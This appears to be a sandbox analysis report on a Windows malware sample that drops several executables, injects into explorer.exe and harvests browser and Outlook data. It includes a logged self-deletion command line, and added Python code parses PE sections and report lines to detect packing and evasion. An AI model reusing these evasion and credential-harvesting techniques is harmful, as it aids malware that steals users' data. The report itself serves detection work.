Source: 5487.exe.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: gecbfdt.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: uucbfdt.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\uucbfdt
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@33/33@11/9
Source: C:\Users\user\AppData\Local\Temp\5487.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Source: file.exe Virustotal: Detection: 36%
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\uucbfdt C:\Users\user\AppData\Roaming\uucbfdt
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\37F1.exe C:\Users\user\AppData\Local\Temp\37F1.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\405E.exe C:\Users\user\AppData\Local\Temp\405E.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\45DE.exe C:\Users\user\AppData\Local\Temp\45DE.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\49F6.exe C:\Users\user\AppData\Local\Temp\49F6.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\509E.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\509E.dll
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5487.exe C:\Users\user\AppData\Local\Temp\5487.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5999.exe C:\Users\user\AppData\Local\Temp\5999.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\5999.exe Process created: C:\Users\user\AppData\Local\Temp\5999.exe C:\Users\user\AppData\Local\Temp\5999.exe
Source: C:\Users\user\AppData\Local\Temp\49F6.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 520
Source: C:\Users\user\AppData\Local\Temp\45DE.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5516 -s 520
Source: unknown Process created: C:\Users\user\AppData\Roaming\gecbfdt C:\Users\user\AppData\Roaming\gecbfdt
Source: C:\Users\user\AppData\Local\Temp\5487.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\5487.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\AppData\Roaming\gecbfdt Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1100 -s 520
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\37F1.tmp
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 1C1E.tmp.20.dr, 28782868176069075816534615.18.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008DCECB CreateToolhelp32Snapshot,Module32First, 0_2_008DCECB
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5516
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1100
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1324
Source: C:\Users\user\Desktop\file.exe Command line argument: ppA 0_2_00416FC0
Source: C:\Users\user\AppData\Roaming\uucbfdt Command line argument: ppA 11_2_00416FC0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Command line argument: 08A 12_2_00413780
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\5487.exe File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: C:\Windows\SysWOW64\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\5999.exe File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts (4 occurrences)
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\weba\kika.pdb source: 405E.exe, 0000000D.00000000.394848625.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, gecbfdt, 0000001E.00000000.484717133.0000000000401000.00000020.00000001.01000000.00000014.sdmp, 405E.exe.1.dr, gecbfdt.1.dr
Source: Binary string: C:\nefih\xugo.pdb source: 5999.exe, 00000013.00000000.409927020.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000013.00000002.470817394.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000019.00000000.431212305.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe.1.dr
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 5999.exe, 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\hegehi\20\gilecozosixebu gazirule82-kekec.pdb source: file.exe, uucbfdt.1.dr
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: QDC:\gabotolupajavi\yakorod\pucomenazis.pdb source: 49F6.exe, 0000000F.00000000.399892526.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 49F6.exe.1.dr
Source: Binary string: nHC:\Windows\System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.530857284.0000000000196000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\gix\modabohuva lopehojeha9-kotisotinago\kayuhoki.pdb source: 45DE.exe, 0000000E.00000000.397590247.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 45DE.exe.1.dr
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbR source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: _.pdb source: 37F1.exe, 0000000C.00000002.549799190.0000000005F55000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.545785192.0000000004B70000.00000004.08000000.00040000.00000000.sdmp, 37F1.exe, 0000000C.00000002.544624082.0000000004A4A000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000003.430586809.0000000002EF0000.00000004.00000020.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000003.426623227.0000000002EB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\gix\modabohuva lopehojeha9-kotisotinago\kayuhoki.pdbx source: 45DE.exe, 0000000E.00000000.397590247.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 45DE.exe.1.dr
Source: Binary string: 1C:\lahikuvobive\puhob.pdbp source: 5487.exe, 00000012.00000000.405253268.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 5487.exe.1.dr
Source: Binary string: C:\gihiyunawajova-92\licirif_zezada\88 lefe.pdb source: 37F1.exe, 0000000C.00000000.391310999.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 37F1.exe.1.dr
Source: Binary string: System.ServiceModel.pdbH source: 37F1.exe, 0000000C.00000002.542633343.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: FC:\weba\kika.pdb source: 405E.exe, 0000000D.00000000.394848625.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, gecbfdt, 0000001E.00000000.484717133.0000000000401000.00000020.00000001.01000000.00000014.sdmp, 405E.exe.1.dr, gecbfdt.1.dr
Source: Binary string: System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.542633343.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\lahikuvobive\puhob.pdb source: 5487.exe, 00000012.00000000.405253268.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 5487.exe.1.dr
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 5999.exe, 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\gabotolupajavi\yakorod\pucomenazis.pdb source: 49F6.exe, 0000000F.00000000.399892526.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 49F6.exe.1.dr
Source: Binary string: System.ServiceModel.pdbK source: 37F1.exe, 0000000C.00000002.552906667.0000000008132000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ^5C:\nefih\xugo.pdb source: 5999.exe, 00000013.00000000.409927020.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000013.00000002.470817394.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000019.00000000.431212305.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe.1.dr

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\37F1.exe Unpacked PE file: 12.2.37F1.exe.400000.0.unpack
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\uucbfdt Unpacked PE file: 11.2.uucbfdt.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Unpacked PE file: 12.2.37F1.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\405E.exe Unpacked PE file: 13.2.405E.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A4A3 push ecx; ret 0_2_0040A4B6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EF9D push ecx; ret 0_2_0040EFB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00701890 push cs; retf 0_2_0070189C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008DE0D4 push cs; retf 0_2_008DE0FF
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0040A4A3 push ecx; ret 11_2_0040A4B6
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0040EF9D push ecx; ret 11_2_0040EFB0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0041C40C push cs; iretd 12_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00423149 push eax; ret 12_2_00423179
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0041C50E push cs; iretd 12_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004231C8 push eax; ret 12_2_00423179
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0040E21D push ecx; ret 12_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0041C6BE push ebx; ret 12_2_0041C6BF
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048DE484 push ecx; ret 12_2_048DE497
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048EBE73 push cs; iretd 12_2_048EBF49
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048EBF75 push cs; iretd 12_2_048EBF49
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048EC125 push ebx; ret 12_2_048EC126
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\509E.dll
Source: sqlite3.dll.18.dr Static PE information: section name: /4
Source: sqlite3.dll.18.dr Static PE information: section name: /19
Source: sqlite3.dll.18.dr Static PE information: section name: /31
Source: sqlite3.dll.18.dr Static PE information: section name: /45
Source: sqlite3.dll.18.dr Static PE information: section name: /57
Source: sqlite3.dll.18.dr Static PE information: section name: /70
Source: sqlite3.dll.18.dr Static PE information: section name: /81
Source: sqlite3.dll.18.dr Static PE information: section name: /92
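The "Unpacked PE file" lines above compare section rights on disk with those observed after unpacking; a .text section that becomes writable (".text:EW") is the classic sign of a packer decrypting its payload in place. The "/4", "/19", ... section names in sqlite3.dll are COFF long-name references into the string table, which GNU binutils (MinGW) emit for section names longer than eight bytes; they identify a MinGW build and are not malicious by themselves. The following is an added example, not code from the report or from the sample: a dependency-free Python section-table parser that renders each section's E/R/W rights in the report's notation and flags writable-and-executable sections, code sections without execute rights, and "/N" names. The PE images it runs on are constructed inside the block (headers and a section table only, not loadable code) and the rule names are this example's own.

```python
import struct

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE             = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE          = 0x20000000
IMAGE_SCN_MEM_READ             = 0x40000000
IMAGE_SCN_MEM_WRITE            = 0x80000000


def parse_sections(pe: bytes):
    """Return [(name, characteristics)] from the section table of a PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    number_of_sections, = struct.unpack_from("<H", pe, coff + 2)
    size_of_optional_header, = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + size_of_optional_header           # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(number_of_sections):
        entry = table + 40 * i
        name = pe[entry:entry + 8].rstrip(b"\0").decode("latin-1")
        characteristics, = struct.unpack_from("<I", pe, entry + 36)
        sections.append((name, characteristics))
    return sections


def rights(characteristics: int) -> str:
    """Render the memory bits as the E/R/W letters the report uses."""
    return "".join(letter for bit, letter in (
        (IMAGE_SCN_MEM_EXECUTE, "E"), (IMAGE_SCN_MEM_READ, "R"), (IMAGE_SCN_MEM_WRITE, "W"),
    ) if characteristics & bit)


def flag_sections(sections):
    """Findings worth a second look (rule names are this example's own)."""
    findings = []
    for name, ch in sections:
        if ch & IMAGE_SCN_MEM_WRITE and ch & IMAGE_SCN_MEM_EXECUTE:
            findings.append(("writable_and_executable", name, rights(ch)))
        if ch & IMAGE_SCN_CNT_CODE and not ch & IMAGE_SCN_MEM_EXECUTE:
            findings.append(("code_without_execute", name, rights(ch)))
        if name.startswith("/") and name[1:].isdigit():
            findings.append(("coff_longname_section", name, rights(ch)))
    return findings


def build_pe(sections):
    """Construct a minimal PE (DOS stub, headers, section table; no code)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))           # e_lfanew
    size_of_optional_header = 224                         # PE32; contents irrelevant here
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0,
                       size_of_optional_header, 0x0102)   # i386, EXECUTABLE_IMAGE|32BIT
    optional = bytes(size_of_optional_header)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("ascii"), 0, 0, 0, 0, 0, 0, 0, 0, ch)
        for name, ch in sections)
    return bytes(dos) + b"PE\0\0" + coff + optional + table


# Constructed samples: one with a writable .text (what an in-place unpacker
# leaves behind) and one shaped like a MinGW build with a "/4" section.
PACKED_SAMPLE = build_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".rsrc", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
])
MINGW_SAMPLE = build_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    ("/4", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
])

if __name__ == "__main__":
    for label, image in (("packed", PACKED_SAMPLE), ("mingw", MINGW_SAMPLE)):
        secs = parse_sections(image)
        print(label, ";".join(f"{n}:{rights(c)}" for n, c in secs), flag_sections(secs))
```

To compare on-disk and in-memory rights the way the report does, run parse_sections once over the file and once over a dump of the process image taken after the unpacking stub has run; the rights string of the same-named section is what changes.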
Source: C:\Users\user\AppData\Local\Temp\5487.exe File created: C:\ProgramData\sqlite3.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gecbfdt
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\uucbfdt
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\37F1.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5999.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\509E.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\405E.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5487.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\45DE.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\49F6.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\uucbfdt:Zone.Identifier read attributes | delete
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\gecbfdt:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\5487.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
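The "Process created" lines earlier in this report and the "File deleted" and Zone.Identifier lines just above are the raw material a triager turns into indicators: the injected explorer.exe launches payloads from %TEMP% and deletes the original sample, regsvr32 /s loads a DLL from a user-writable directory, 5487.exe removes itself with "cmd /c timeout /t 6 & del /f /q ...", and the Zone.Identifier streams of the persisted copies are opened with delete access so the mark-of-the-web disappears. The following is an added example, not code from the report or from the sample: a Python parser for lines in the report's own "Source: <actor> <event>: <detail>" shape that rebuilds the parent/child process tree and flags those five patterns. The input is a constructed handful of lines copied from this report, with the "Jump to behavior" link text left in so the parser has to strip it; the rule names and the SAMPLE_PATH constant are this example's own.

```python
import re
from collections import defaultdict

# Constructed sample: lines in the shape this report uses, copied from the
# process-creation and file-system sections. The trailing "Jump to behavior"
# link text is deliberately kept so the parser must discard it.
SAMPLE_LINES = r"""
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5487.exe C:\Users\user\AppData\Local\Temp\5487.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\509E.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\5487.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\uucbfdt:Zone.Identifier read attributes | delete Jump to behavior
"""

# Path the sandbox ran the submitted sample from (hypothetical constant for
# this example; read it from the report header in practice).
SAMPLE_PATH = r"c:\users\user\desktop\file.exe"

EVENT_RE = re.compile(
    r"^Source: (?P<actor>\S+) (?P<kind>Process created|File deleted|File opened): "
    r"(?P<detail>.*?)(?: Jump to [\w ]+)?$"
)


def parse_report(text):
    """Turn report lines into dicts. Image paths in this report carry no spaces,
    so the first token of a 'Process created' detail is the child image."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue                      # other event kinds are ignored here
        ev = m.groupdict()
        if ev["kind"] == "Process created":
            ev["image"], _, ev["cmdline"] = ev["detail"].partition(" ")
        events.append(ev)
    return events


def build_tree(events):
    """Map parent image (lower-cased) -> list of child images."""
    tree = defaultdict(list)
    for ev in events:
        if ev["kind"] == "Process created":
            tree[ev["actor"].lower()].append(ev["image"])
    return dict(tree)


def find_indicators(events):
    """Rules mirroring behaviours seen in this report (names are this example's own)."""
    findings = []
    for ev in events:
        actor, detail = ev["actor"], ev["detail"]
        if ev["kind"] == "Process created":
            image, cmd = ev["image"].lower(), ev["cmdline"]
            # A system binary launching executables dropped under %TEMP%.
            if actor.lower().endswith("\\explorer.exe") and "\\appdata\\local\\temp\\" in image:
                findings.append(("explorer_spawns_temp_exe", ev["image"]))
            # Silent regsvr32 registration of a DLL from a user-writable directory.
            if image.endswith("\\regsvr32.exe") and re.search(r"/s\b", cmd, re.I) \
                    and re.search(r"\\(AppData|ProgramData)\\", cmd, re.I):
                findings.append(("regsvr32_silent_user_dir", cmd))
            # The parent asks cmd.exe to delete the parent's own image.
            if image.endswith("\\cmd.exe") and re.search(r"\bdel\b.*" + re.escape(actor), cmd, re.I):
                findings.append(("self_delete_via_cmd", actor))
        elif ev["kind"] == "File deleted" and detail.lower() == SAMPLE_PATH:
            findings.append(("sample_deleted_after_install", actor))
        elif ev["kind"] == "File opened" and ":zone.identifier" in detail.lower() \
                and "delete" in detail.lower():
            findings.append(("motw_stream_opened_for_delete", detail))
    return findings


if __name__ == "__main__":
    evs = parse_report(SAMPLE_LINES)
    for parent, children in build_tree(evs).items():
        print(parent, "->", children)
    for rule, evidence in find_indicators(evs):
        print(f"{rule:32} {evidence}")
```

The self-deletion rule keys on the parent path appearing after "del" in the child's command line rather than on "timeout", because the delay command varies (ping, choice and timeout are all common) while the delete of the caller's own path does not.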
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX (48 occurrences)
Source: C:\Users\user\AppData\Local\Temp\5487.exe Process information set: NOOPENFILEERRORBOX
